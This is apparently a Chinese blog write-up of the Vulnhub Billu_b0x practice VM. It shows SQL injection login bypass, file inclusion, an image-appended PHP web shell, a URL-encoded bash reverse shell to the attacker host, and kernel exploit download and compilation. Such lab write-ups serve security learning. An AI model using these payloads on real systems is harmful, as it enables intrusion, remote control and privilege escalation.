Vulnhub靶场 Billu_b0x 练习

news2024/12/28 20:54:00

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
  • 0x03 漏洞查找与利用
    • 1. 文件包含
    • 2. SQL注入
    • 3. 文件上传
    • 4. 反弹shell
    • 5. 提权(思路1:ssh)
    • 6. 提权(思路2:内核)
    • 7. 补充
  • 0x04 总结


0x00 准备


下载链接:https://download.vulnhub.com/dc/DC-6.zip

介绍:

This Virtual machine is using ubuntu (32 bit)

Other packages used: -

  • PHP
  • Apache
  • MySQL

This virtual machine is having medium difficulty level with tricks.

One need to break into VM using web application and from there escalate privileges to gain root access

For any query ping me at https://twitter.com/IndiShell1046

Enjoy the machine



0x01 主机信息收集


kali的IP地址:192.168.119.128,eth0

发现目标主机IP:netdiscover -i eth0 -r 192.168.119.0/24

目标主机IP:192.168.119.133

探测目标主机的开放端口,执行命令:nmap -sV -p 1-65535 -A 192.168.119.133
在这里插入图片描述



开放了22端口(openssh5.9),80端口(apache2.2.22)。

直接在浏览器访问80端口:
在这里插入图片描述



0x02 站点信息收集


这个靶机的介绍里面有说明这是个apache+php+mysql的站点。利用插件也可以知道这是个php站点。

看一下站点的目录结构:dirsearch -u 192.168.119.133
在这里插入图片描述



依次访问一下发现几个看起来比较有用的地方,add是一个上传图片的地方:
在这里插入图片描述



images里面是站点用到的一些图片:
在这里插入图片描述



index页面就是前面看到的首页了,有username和password的输入框。

phpmy是phpmyadmin的登录页面:
在这里插入图片描述



test页面是一个提示,利用file参数提供文件路径:
在这里插入图片描述



in页面是phpinfo的页面:
在这里插入图片描述



0x03 漏洞查找与利用


根据上面查找出来的信息,可以尝试三个思路。一个是首页的sql注入,另一个是文件上传,还有一个是文件包含。

1. 文件包含


前面在test页面有个提示,可以用file参数提供文件路径。

访问:192.168.119.133/test?file=/etc/passwd

访问:192.168.119.133/test?file=/etc/passwd/test?file=…/…/…/…/…/…/…/etc/passwd

都是一样的提示,file参数是空的。

考虑用POST方式提交:
在这里插入图片描述



可以看到读取文件成功。
(这里用POST方式提交的时候也可以用curl命令:curl -d "file=/etc/passwd" http://192.168.119.133/test

尝试读取网站的其他文件,前面扫描出来的目录可以都试一下,例如读取add.php:
在这里插入图片描述



在c.php中看到了数据库的用户名是billu,密码是b0x_billu,默认数据库是ica_lab:
在这里插入图片描述



在index.php中看到了登录的数据库查询语句:select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\’ ,并且使用了str_replace函数移除了用户名和密码中包含的单引号。
在这里插入图片描述



在test.php中看到源码。这段代码的大体意思是通过post给file参数提供一个文件路径,如果这个文件存在,就设置相关的http信息来下载文件,如果文件不存在或者file参数没有值,则输出一段提示信息:
在这里插入图片描述



2. SQL注入


在上一步文件包含的时候查看了index页面的源代码,发现了sql查询语句,单数输入的单引号被过滤了:

select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\’

只是单引号被过滤了,#\还没被过滤。思路就是用#注释掉最后一个单引号,中间的单引号用反斜杠转义一下。

where pass=‘123\’ and uname=’123#’

这样的话就变成了查询 pass是 123\’ and uname= 的情况。



数据库中应该没有这样的password。那就再后面拼接一个or,所以构造下面这样的查询语句:

where pass=‘123\’ and uname=’ or 1=1 #’

上面这个语句的意思就是查询pass是123\’ and uname= 或者 1=1。这时候应该查询成功了。


所以构造的用户名是: or 1=1 #
密码是:123\
在这里插入图片描述



登录成功以后跳转到panle页面:
在这里插入图片描述



3. 文件上传


点击continue以后,会出现用户名和image。
在这里插入图片描述



点击 add user,continue以后会出现上传文件的地方。上传一个非图片的文件后会提示只能上传图片类的文件:
在这里插入图片描述



考虑制作一个图片马上传到这里。

准备一个图片 1.jpg。

准备一个2.php文件,内容如下:<?php system($_GET['cmd']); ?>

执行命令将代码写到图片末尾:cat 2.php >> 1.jpg
在这里插入图片描述



可以再看一下图片内容,在最后面可以看到写入的代码:cat 1.jpg
在这里插入图片描述



回到panel页面,添加一个用户。添加成功后show一下:
在这里插入图片描述



用前面的文件包含来看一下panel页面的代码,比较重要的部分贴在下面:

if(isset($_POST['continue'])) {
    $dir = getcwd();  // 获取当前工作目录
    $choice = str_replace('./', '', $_POST['load']);  // 获取用户选择的操作

    if($choice === 'add') {
        include($dir.'/'.$choice.'.php');
        die();
    }

    if($choice === 'show') {
        include($dir.'/'.$choice.'.php');
        die();
    } else {
        include($dir.'/'.$_POST['load']);
    }
}

这段代码用str_replace函数去除了post请求中load参数值的 ./ 。如果用户选择了 add,则展示 add.php 文件;如果用户选择了 show,则展示 show.php 文件。这里用了include函数,并且包含文件的时候choice是可控的,这里应该也可以进行文件包含。

if(isset($_POST['upload'])) {
    $name = mysqli_real_escape_string($conn, $_POST['name']);
    $address = mysqli_real_escape_string($conn, $_POST['address']);
    $id = mysqli_real_escape_string($conn, $_POST['id']);
    
    if(!empty($_FILES['image']['name'])) {
        $iname = mysqli_real_escape_string($conn, $_FILES['image']['name']);
        $r = pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION);
        $image = array('jpeg', 'jpg', 'gif', 'png');
        if(in_array($r, $image)) {
            $finfo = @new finfo(FILEINFO_MIME);
            $filetype = @$finfo->file($_FILES['image']['tmp_name']);
            if(preg_match('/image\/jpeg/', $filetype) || preg_match('/image\/png/', $filetype) || preg_match('/image\/gif/', $filetype)) {
                if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name'])) {
                    echo "Uploaded successfully ";
                    $update = 'INSERT INTO users(name, address, image, id) VALUES(\''.$name.'\', \''.$address.'\', \''.$iname.'\', \''.$id.'\')';
                    mysqli_query($conn, $update);
                }
            } else {
                echo "<br>i told you dear, only png, jpg and gif file are allowed";
            }
        } else {
            echo "<br>only png, jpg and gif file are allowed";
        }
    }
}

这段代码就是处理用户上传的文件。使用mysqli_real_escape_string函数数据进行转义。检查用户上传的文件的扩展名是否为jpg,jpeg,gif,png,使用finfo获取文件的MIME类型,确保上传的是图像文件。使用move_uploaded_file()将图像文件移动到 uploaded_images目录中,将用户的name,address,image和id插入数据的users表中。



在这段代码中发现了一个新的目录,访问一下,可以看到刚才上传的文件 1.jpg:
在这里插入图片描述



访问一下这个图片,并且给cmd参数提供一个值whoami,结果并没有执行命令:
在这里插入图片描述



通过前面的分析,文件包含目前有两个地方。一个是test页面的file参数,再就是上面的panel页面的load参数。

试了一下test页面的,并没有执行代码:
在这里插入图片描述



再尝试一下panel页面的,发现可以执行代码:
在这里插入图片描述



那就可以利用这个进行反弹shell。



4. 反弹shell


在kali监听6677端口,执行命令:nc -lvvp 6677
在这里插入图片描述

接下来准备构造反弹shell的语句:

语句本身:echo "bash -i >& /dev/tcp/192.168.119.128/6677 0>&1" | bash

由于用get方式提交的这个参数,并且带有特殊字符,所以为了防止解析错误,需要对这个进行url编码,结果为:%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%31%39%2e%31%32%38%2f%36%36%37%37%20%30%3e%26%31%22%20%7c%20%62%61%73%68

把上面这段代码拼接到cmd参数后面:
在这里插入图片描述



发现监听成功:
在这里插入图片描述



5. 提权(思路1:ssh)


看一下当前目录下的文件,没发现有什么。

再看一下当前用户可以执行的命令:sudo -l,报错:
在这里插入图片描述



在这种情况下,这种错误出现一般是因为这里是非交互式环境。可以执行下面的命令获取交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'

再次执行 sudo -l,需要输入密码。只能换个思路。
在这里插入图片描述



再看看有没有什么敏感文件,执行命令:ls -l
在这里插入图片描述



发现了phpmy目录。想起来在一开始扫描目录结构的时候发现了phpmyadmin的登陆页面。进入这个目录看有没有敏感信息。有个config.inc.php文件,查看一下文件的内容,发现了数据库的用户名为root,密码是roottoor,并且下面的一项设置导致不用密码也能登录:
在这里插入图片描述



利用这个用户名密码去phpmy页面进行登录,发现登陆失败。应该不是这个数据库密码,空密码也不能登录,说明这个配置文件和这个页面没啥直接关系。

换个思路,前面还有个22端口没有利用。尝试用这个账号密码进行ssh链接:ssh root@192.168.119.133
在这里插入图片描述

以root身份登录成功。



6. 提权(思路2:内核)


看了一些佬的文章,还可以进行内核提权。

在反弹shell以后,查看系统版本:cat /etc/issue

在这里插入图片描述



查询可以利用的漏洞:searchsploit ubuntu 12.04
在这里插入图片描述



利用 37292.c 这个exp。

将这个文件复制到网站根目录下:cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html

开启apache服务:/etc/init.d/apache2 start
在这里插入图片描述



在反弹的shell中,进入/tmp目录:cd /tmp

(因为tmp目录是全局可写的,所有的用户都可以存放文件。)

下载 37292.c 文件到目标主机:wget http://192.168.119.128/37292.c

将这个文件编译,输出到文件 baji:gcc 37292.c -o baji

执行文件:./baji
在这里插入图片描述



7. 补充


前面用文件包含读源码的时候,在c.php中看到了数据库的用户名是billu,密码是b0x_billu,默认数据库是ica_lab。这个在index页面是无法登录的,这个应该用在phpmy页面进行登录。

登录上以后,在 ica_lab 数据库的auth表中可以看到用户名和密码,可以用这里获取到的信息在index页面登录。
在这里插入图片描述



0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放的端口和服务。

站点信息收集:

  1. 扫描站点目录,依次访问。
  2. 发现一个index登录页,phpmyadmin的登录页。
  3. 在test页根据提示发现了文件包含,可以读取源码。

漏洞利用:

  1. 文件包含查看源码,发现sql查询语句,根据这个语句进行sql注入,成功登录index页面。
  2. 上传图片马,执行系统命令,进行反弹shell。
  3. 读取配置文件,获取敏感信息,进行ssh链接。
  4. 获得系统的版本信息,进行内核提权。



本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2241412.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

软间隔支持向量机支持向量的情况以及点的各种情况

软间隔支持向量 ​ 这一节我们要回答的问题是&#xff1f;如何判断一个点是软间隔支持向量机中的支持向量&#xff0c;在硬间隔支持向量机中&#xff0c;支持向量只需要满足一个等式&#xff1a; y i ( w T x i b ) − 1 0 y_i(w^Tx_i b) -1 0 yi​(wTxi​b)−10 ​ 在软间…

PCA 原理推导

针对高维数据的降维问题&#xff0c;PCA 的基本思路如下&#xff1a;首先将需要降维的数据的各个变量标准化&#xff08;规范化&#xff09;为均值为 0&#xff0c;方差为 1 的数据集&#xff0c;然后对标准化后的数据进行正交变换&#xff0c;将原来的数据转换为若干个线性无关…

在Ubuntu 24.04 LTS上安装飞桨PaddleX

前面我们介绍了《在Windows用远程桌面访问Ubuntu 24.04.1 LTS》本文接着介绍安装飞桨PaddleX。 PaddleX 3.0 是基于飞桨框架构建的一站式全流程开发工具&#xff0c;它集成了众多开箱即用的预训练模型&#xff0c;可以实现模型从训练到推理的全流程开发&#xff0c;支持国内外多…

Web_前端_HTML入门学习的案例案例1

HTML入门学习的案例 来源: HTML入门学习的案例_给学生讲html内容案例-CSDN博客 案例1&#xff1a;hello.html <html><body><title>html技术</title></body><body>hello</body> </html>&#xff08;但是有乱码&#xff09; …

【C#】C#编程入门指南:构建你的.NET开发基础

文章目录 前言&#xff1a;1. C# 开发环境 VS的基本熟悉2. 解决方案与项目的关系3. 编辑、编译、链接、运行4. 托管代码和CLR4.1 CLR&#xff1a;4.2 C# 代码第编译过程&#xff08;两次编译的&#xff09; 5. 命名空间6. 类的组成与分析7. C# 的数据类型7.1 值类型7.2 引用类型…

115页PDF | 埃森哲_XX集团信息化能力成熟度评估及能力提升方案(限免下载)

一、前言 这份报告是埃森哲_XX集团信息化能力成熟度评估及能力提升方案&#xff0c;报告首先分析了集团的战略规划&#xff0c;包括调整优化期、转型升级期和跨越发展期的目标&#xff0c;然后识别了集团面临的内部挑战和外部压力&#xff0c;如管控体系不完善、业务板块多样化…

面试时问到软件开发原则,我emo了

今天去一个小公司面试&#xff0c;面试官是公司的软件总监&#xff0c;眼镜老花到看笔记本电脑困难&#xff0c;用win7的IE打开leetcode网页半天打不开&#xff0c;公司的wifi连接不上&#xff0c;用自己手机热点&#xff0c;却在笔记本电脑上找不到。还是我用自己的手机做热点…

Wi-Fi背后的工作原理与技术发展历程介绍【无线通信小百科】

1个视频说清楚WIFI&#xff1a;频段/历程/技术参数/常用模块 智能手机拥有率越来越高的今天&#xff0c;大家已经习惯了通过无线网络上网的方式。除了在外面需要用手机流量&#xff0c;我们通常在家里或者机场&#xff0c;商场都可以通过Wi-Fi连接上网。本期文章将为大家介绍Wi…

【MySQL 保姆级教学】详细讲解视图--(15)

视图 1. 为什么要有视图&#xff1f;2.视图的定义和特点3. 创建视图4. 视图的使用举例4.1 创建表并插入数据4.2 举例 5. 视图和基表之间有什么联系呢&#xff1f; 1. 为什么要有视图&#xff1f; 当我们频繁地使用用多表查询和复合查询出的结果时&#xff0c;就需要频繁的使用…

Python中的HTTP协议

文章目录 一. 网址URL二. HTTP协议1. HTTP协议的概念2. HTTP协议的作用3. HTTP请求报文与响应报文① HTTP请求报文Ⅰ. GET请求报文格式Ⅱ. GET请求报文分析Ⅲ. POST请求报文格式Ⅳ. POST请求报文分析Ⅴ. GET与POST请求报文总结 ② HTTP响应报文Ⅰ. HTTP响应报文格式Ⅱ. HTTP响应…

108. UE5 GAS RPG 实现地图名称更新和加载关卡

在这一篇里&#xff0c;我们将实现对存档的删除功能&#xff0c;在删除时会有弹框确认。接着实现获取玩家的等级和地图名称和存档位置&#xff0c;我们可以通过存档进入游戏&#xff0c;玩家在游戏中可以在存档点存储存档。 实现删除存档 删除存档需要一个弹框确认&#xff0…

DNS批量解析管理软件有什么用

在复杂的网络环境中&#xff0c;DNS批量解析管理软件犹如一把功能强大的钥匙&#xff0c;开启了高效网络管理的大门&#xff0c;为网络运营和维护带来了诸多便利。 1、对于网络服务提供商而言&#xff0c;DNS批量解析管理软件极大地提高了工作效率 传统的DNS解析管理方式在处…

IoT [remote electricity meter]

IoT [remote electricity meter] 物联网&#xff0c;远程抄表&#xff0c;电表数据&#xff0c;举个例子

sql数据库-排序查询-DQL

目录 语法 排序方式 举例 将表按年龄从小到大排序 将表按年龄从大到小排序 ​编辑 多重排序 将表按年龄升序&#xff0c;年龄相同按入职时间降序 语法 select * from 表名 order by 字段名1 排序方式1&#xff0c;字段2 排序方式2; 排序方式 升序&#xff1a;ASC&…

在spring boot工程中使用Filter时,@WebFilter 注解不生效的问题分析和解决方案

1. 问题描述 首先编写一个Filter类并通过Component放入spring容器中&#xff0c;通过实现jakarta.servlet中提供的Filter接口完成过滤器的创建&#xff0c;代码如下。 import jakarta.servlet.*; import jakarta.servlet.annotation.WebFilter; import org.springframework.st…

学习threejs,使用TWEEN插件实现动画

&#x1f468;‍⚕️ 主页&#xff1a; gis分享者 &#x1f468;‍⚕️ 感谢各位大佬 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! &#x1f468;‍⚕️ 收录于专栏&#xff1a;threejs gis工程师 文章目录 一、&#x1f340;前言1.1 ☘️THREE.PLYLoader PLY模型加…

TypeScript在现代前端开发中的应用

&#x1f493; 博客主页&#xff1a;瑕疵的CSDN主页 &#x1f4dd; Gitee主页&#xff1a;瑕疵的gitee主页 ⏩ 文章专栏&#xff1a;《热点资讯》 TypeScript在现代前端开发中的应用 TypeScript在现代前端开发中的应用 TypeScript在现代前端开发中的应用 引言 TypeScript 概述…

CTF-Crypto-简单加密

打开首页看题目 描述看起来是一段乱码&#xff0c;拉入随波逐流&#xff0c;未解决 e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA 观察字符串&#xff0c;末尾是AA&#xff0c;其中可能含有base64加密 找寻Ascll码表&#xff0c;发现A的Ascll是65&#xff0c;的Ascl…

MacOS下,如何在Safari浏览器中打开或关闭页面中的图片文字翻译功能

MacOS下&#xff0c;如何在Safari浏览器中打开或关闭页面中的图片文字翻译功能 在Mac上的Safari浏览器中&#xff0c;可以通过实况文本功能来实现图片中的文本翻译。关闭步骤具体步骤如下&#xff1a; 在浏览器地址栏&#xff0c;鼠标右击翻译按钮&#xff0c;然后点击“首选…

操作系统——虚拟存储器(含思维导图)

本教材为中国铁道出版社——操作系统&#xff08;第四版&#xff09;刘振鹏、张明、王煜著。本篇文章为第六章复习。 目录 思维导图&#xff1a; ​编辑一、虚拟存储器 1.理论基础 2.定义 二、分页虚拟存储管理 1.基本原理 2.缺页中断 3.页面置换 &#xff08;1&…